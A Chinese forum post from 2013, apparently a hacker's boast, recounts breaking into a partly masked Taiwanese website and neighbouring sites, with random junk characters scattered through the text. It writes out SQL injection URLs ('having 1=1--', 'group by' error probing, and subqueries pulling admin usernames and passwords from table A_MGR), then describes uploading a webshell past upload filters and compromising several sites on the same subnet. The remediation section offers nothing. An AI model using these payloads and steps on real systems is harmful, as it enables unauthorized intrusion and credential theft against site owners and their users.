发现一个注入点
1 r9 Z2 t# l/ Yhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
# n2 `( \* S$ U4 l
: u$ f4 x5 Q+ R9 Z习惯性的加’having1=1--
. y1 G6 A, H% z; h$ s8 J2 u
- o D4 L G s! p+ \http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—, B% O( x% ^$ j/ E
, \, k$ p4 z% {% q1 { ^07 C& L9 m: Q0 l: }) `3 G
; s! K: F S: O0 C: }爆出Diary_A.dl_Title(这时候很激动啊)
. v0 S" F# j, U% S% e- n1 w7 F2 D9 {
3 n. B3 R5 f9 f9 f( X# L4 R7 ^那么继续 ] l0 ]5 s- j% R; O O& S; K) `6 \' E
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
! _* a8 P) H' `/ Q& \
& ^) u! q7 y1 M. M继续,一直爆下去- D% F% k1 L1 Q
* t1 R" g8 Y& x- i, W爆到几个字段和表段 但是没找到需要的管理用户的字段
2 d' T) c( \6 g& r$ \
! S) S" I [2 T/ {; U蛋疼了 怎么办 然后去后台登陆页看源码
1 J. c* y& z; ^0 ^, Y
% m3 n# U- Z/ a0
' K7 A0 ~$ R8 O$ `6 Q: c& i7 z! e$ }' ~, J& N) v- q
Input name= “ADUID”- D* k" K- q6 R: v' I
Input name= “ADPWD”
# s% ~& Y0 k4 w" Q m, Z% Y9 y# d
很幸运 找到了字段那就继续
s- Y$ H/ d* y- _/ X0 q0 h8 W& H找到之后开始爆用户( `# e* a3 p7 \6 Y5 E7 h
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—) \8 Z3 X6 N- t1 `
爆密码" `8 g5 J% R9 ]/ r* G* B
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—, r/ s# j [% H
测试了下 这个注入点只能爆到文章哪里的表 $ k! a* o! u% Q. a7 z4 ?
1 }# i3 \5 U3 M( w' M% w& @' C( S: z
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了6 ~9 ?0 M& o: R) x& d! z3 Z
6 h) Z9 N2 g8 Y0 R+ w' g
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了/ I, O7 z; [& @% c* o1 |& O
: Y; a$ Y" m* @. Z' d" }
473
3 r7 b3 ^+ U! G
, S1 V3 B+ j5 q+ J' v进后台) A& k$ Y. k5 N- I
" e6 t9 Z- \6 \5 D
; P) K* t# p+ r3 [发现几个上传点 有的地方不能上传 而且防止恶意代码! r/ x, n+ [6 T; S6 n
3 ^9 n! W7 J1 ?0 h, [) u
没办法 各种百度各种找大牛 找到一只好像可以突破的马
4 q( [1 j* d+ w2 b- G: }; {2 V5 b* k- _ ]0 ]
+ n* B$ n$ M$ \
在系统管理那里直接上传 不过没有显示地址
" }7 Q0 i- R7 L, H& p9 v0 _) x8 R' B) G' O9 x
再上传一次 抓包 搞定OK% w5 `$ r( ~4 ^, M) g, y+ ]% B. e
& w) Z" n G$ o+ s8 x- A
$ M4 {( r1 N3 q4 s; J( q& N
. H K% q" x ]8 B4721 v9 {9 I5 \$ K
" d# L0 a$ q& r晚上不行了 去睡觉。。。
$ D9 [8 v8 g m* J O- [第二天刚起床 闲的没事做继续日站吧 ) |1 X& C6 G! e" W3 M
; w$ {$ U, a e' `. S找个站 就把这个站的旁c扫了下0 M" R3 }9 v- [: _' Q+ Q3 I
% E/ T8 S5 i8 f( c/ I
发现c段也有一个购物站 ,然后还和这个站的模板差不多4 x1 g) _; K+ T2 u- A7 G
% Z( N- b5 }4 ~# N; Q9 A9 a( j/ D就找到会员登录口测试
1 d6 D' u) B1 O- k2 f# b. k7 z7 I/ B! |+ S) E) b# z3 t5 _
'and (select top 1 MGR_UID from A_MGR)>0—1 D: l( @3 t9 F' G1 {) u- ]
果断爆到了 这时候我很激动 通杀; [# K! q$ F5 N3 R" ^- y
7 [& ]5 \3 m3 i# G; e( i6 ^
再次翻c段" {: u9 q$ f3 R% |" t8 ]7 g! s' O4 @
. a& ^6 V; V% {翻出几个站 都成功拿下. }' X T" k3 S
: ^: w3 A) \/ M) ^% s' r
. N1 P1 h$ T, p- ?' y8 N
" w+ P3 A5 J5 @$ ~* Q修复方案:
! g. Y6 c } Q1 b/ R: i" e4 F他们比我专业
; W4 B9 ?( Z" i9 O
. c* W t+ Q; B a6 X4 j6 E2 J) T6 v! z
1 P6 f6 p! h+ @) M
|
发表于 2013-4-4 17:40:38
收藏
支持
反对